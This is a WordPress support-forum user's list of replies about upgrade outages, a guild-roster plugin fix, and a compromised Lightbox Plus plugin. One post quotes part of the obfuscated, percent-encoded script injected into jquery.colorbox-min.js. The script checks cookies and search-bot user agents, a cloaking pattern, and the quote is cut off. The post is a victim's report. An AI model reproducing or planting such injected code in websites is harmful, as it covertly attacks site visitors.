sonburn
Forum Replies Created
-
Sorry to keep following up on my own post. I guess while it’s related to the plugin, it’s not the fault of the plugin. It appears some malicious code has been injected into the plugin. I have uninstalled it completely, reinstalled, and now I begin the quest of finding out how this happened. Sorry.
According to the Google Webmaster Tools…
Problematic URL:
/wp-content/plugins/lightbox-plus/js/jquery.colorbox-min.js?ver=1.3.8Suspected injected code:
document.write(unescape(‘%3C%73%63%72%69%70%74%3E%76%61%72%2
0%61%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%67%6F%74%3D%2
2%2B%65%73%63%61%70%65%28%22%67%6F%74%22%29%2B%22%3B%70%61%7
4%68%3D%2F%22%3B%76%61%72%20%62%3D%77%69%6E%64%6F%77%2E%6E%6
1%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2C%63%3
D%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6
F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%6
2%69%6E%67%7C%61%73%6B%29%2F%69%2C%64%3D%6E%61%76%69%67%61%7
4%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%2C%65%3D%22%20%22%2
B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2C%66%3D%6E%7
5%6C%6C%2C%67%3D%30%2C%68%3D%30%3B%69%66%28%65%2E%6C%65%6E%6
7%74%68%3E%30%29%7B%67%3D%65%2E%69%6E%64%65%78%4F%66%28%22%2
0%67%6F%74%3D%22%29%3B%69%66%28%67%21%3D%2D%31%29%7B%67%2B%3
D%35%3B%68%3D%65%2E%69%6E%64%65%78%4F%66%28%22%3B%22%2C%67%2
9%3B%69%66%28%68%3D%3D%2D%31%29%68%3D%65%2E%6C%65%6E%67%74%6
8%3B%66%3D%75%6E%65%73%63%61%70%65%28%65%2E%73%75%62%73%74%7
2%69Forum: Installing WordPress
In reply to: Auto Upgrade to 2.8 Now Site is DownCheck the post “2.8 upgrade issue with “Premature end of script headers: php5″ (3 posts)” with the helpful tip from Samboll
Forum: Installing WordPress
In reply to: 2.8 upgrade issue with “Premature end of script headers: php5”This solution worked for me, thank you… a lot of people are having this problem.
Forum: Installing WordPress
In reply to: HELP wp-admin works but blank page only on urlI am having the exact same problem, tried de-activating plugins, still no luck. Seems this is happening to a few people, hope to see some help on the topic soon.
Forum: Installing WordPress
In reply to: Auto Upgrade to 2.8 Now Site is DownI am having the same problem… would love to figure out a solution.
Forum: Installing WordPress
In reply to: White wall of deathI de-activated my plugins in hopes that it would make my site responsive, no luck. I can access wp-admin, but I cannot access my main site any longer. Any thoughts?
Forum: Installing WordPress
In reply to: Can’t go anywhere in my webpage!I am having a similar problem… except I cannot even get to my home page (index). I can bring up the wp-admin fine, and I can check out the database through my host, but the actual website content is completely un-responsive.
https://www.continentaltypes.com
Any help would be greatly appreciated.
Forum: Plugins
In reply to: [Plugin: WoW Guild Retrieve] Image links brokenI was able to make some fixes…
For the guild header information, the following changes need to be made:
Line 146 – GUILDKEY needs to be changed to GUILDHEADER
Line 149 – FACTIONID needs to be change to FACTIONFor the roster table, the following changes need to be made:
Line 169 – RACE needs to be changed to RACEID
Line 169 – GENDER needs to be changed to GENDERID
Line 170 – CLASS needs to be changed to CLASSIDBut there is a big problem with the images he has stored in the plugin, and the values provided by the armory. The values provided by the armory are numeric, which you could use to assemble a file name (the way the armory does it). Example: 0-1-6.gif = male-human-dk. But the author of the plugin has the images with literal name, and I dont see anywhere in the plugin where the literal names are gathered from the raceid, classid, and genderid. Anyway, I am working on my own fix for the rest…
Forum: Plugins
In reply to: [Plugin: WoW Guild Retrieve] Image links brokenYes, the images are broken for me too. The armory was just updated recently, I am sure there was a change made that borked this plugin.